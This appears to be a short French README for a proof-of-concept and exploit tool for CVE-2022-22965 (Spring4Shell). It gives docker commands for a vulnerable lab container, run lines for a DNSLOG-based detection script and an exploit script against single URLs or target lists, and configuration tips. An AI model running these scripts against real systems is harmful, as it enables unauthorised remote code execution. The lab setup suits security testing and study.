
Spring-0day/CVE-2022-22965
Spring Framework/CVE-2022-22965
ID de vulnérabilité : CVE-2022-22965/CNVD-2022-23942/QVD-2022-1691
docker pull vulfocus/spring-core-rce-2022-03-29
docker run -dit -p 8080:8080 vulfocus/spring-core-rce-2022-03-29

Il est recommandé d'utiliser le POC pour détecter la cible. Son avantage est de vérifier si la vulnérabilité existe grâce à DNSLOG, et il ne modifiera pas la configuration des journaux de tomcat
python3 cve-2022-22965-poc.py -url https://example.com/
python3 cve-2022-22965-poc.py -file file.txt

python3 cve-2022-22965.py -url https://example.com/
python3 cve-2022-22965.py -file file.txt

python3 cve-2022-22965-poc.py -url https://example.com/

python3 cve-2022-22965.py -url http://example.com/

Ajoutez les routes courantes à la ligne 13
routs = ['env',]
Ajoutez le chemin commun à la ligne 12
path = ['root',]

Pour un apprentissage sûr uniquement, ne pas utiliser illégalement
Réservé à un apprentissage sûr, ne pas utiliser illégalement